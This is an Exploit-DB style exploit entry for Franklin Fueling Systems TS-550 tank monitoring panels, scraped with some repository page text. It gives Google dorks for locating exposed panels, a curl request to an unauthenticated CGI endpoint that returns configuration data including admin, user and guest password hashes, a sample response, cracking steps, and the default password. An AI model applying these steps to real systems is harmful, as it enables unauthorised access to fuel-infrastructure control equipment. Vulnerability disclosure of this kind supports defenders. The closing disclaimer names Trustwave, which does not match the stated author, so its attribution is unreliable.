bd09027499
18 changes to exploits/shellcodes/ghdb Franklin Fueling Systems TS-550 - Default Password Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information Linux Kernel 6.2 - Userspace Processes To Enable Mitigation Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) Chitor-CMS v1.1.2 - Pre-Auth SQL Injection GDidees CMS 3.9.1 - Local File Disclosure Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE) Serendipity 2.4.0 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE) AspEmail v5.6.0.2 - Local Privilege Escalation File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
60 lines
No EOL
2.1 KiB
Text
60 lines
No EOL
2.1 KiB
Text
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
|
|
# Date: 4/16/2023
|
|
# Exploit Author: parsa rezaie khiabanloo
|
|
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
|
|
# Version: TS-550
|
|
# Tested on: Linux/Android(termux)
|
|
|
|
Step 1 : attacker can using these dorks and access to find the panel
|
|
|
|
inurl:"relay_status.html"
|
|
|
|
inurl:"fms_compliance.html"
|
|
|
|
inurl:"fms_alarms.html"
|
|
|
|
inurl:"system_status.html"
|
|
|
|
inurl:"system_reports.html'
|
|
|
|
inurl:"tank_status.html"
|
|
|
|
inurl:"sensor_status.html"
|
|
|
|
inurl:"tank_control.html"
|
|
|
|
inurl:"fms_reports.html"
|
|
|
|
inurl:"correction_table.html"
|
|
|
|
Step 2 : attacker can send request
|
|
|
|
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
|
|
|
|
|
|
Step 3 : if get response that show like this
|
|
|
|
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
|
|
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
|
|
<ROLE_LIST>
|
|
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
|
|
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
|
|
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
|
|
</ROLE_LIST>
|
|
|
|
|
|
Step 4 : attacker can crack the hashesh using john the ripper
|
|
|
|
notice : most of the panels password is : admin
|
|
|
|
Disclaimer:
|
|
The information provided in this advisory is provided "as is" without
|
|
warranty of any kind. Trustwave disclaims all warranties, either express or
|
|
implied, including the warranties of merchantability and fitness for a
|
|
particular purpose. In no event shall Trustwave or its suppliers be liable
|
|
for any damages whatsoever including direct, indirect, incidental,
|
|
consequential, loss of business profits or special damages, even if
|
|
Trustwave or its suppliers have been advised of the possibility of such
|
|
damages. Some states do not allow the exclusion or limitation of liability
|
|
for consequential or incidental damages so the foregoing limitation may not
|
|
apply. |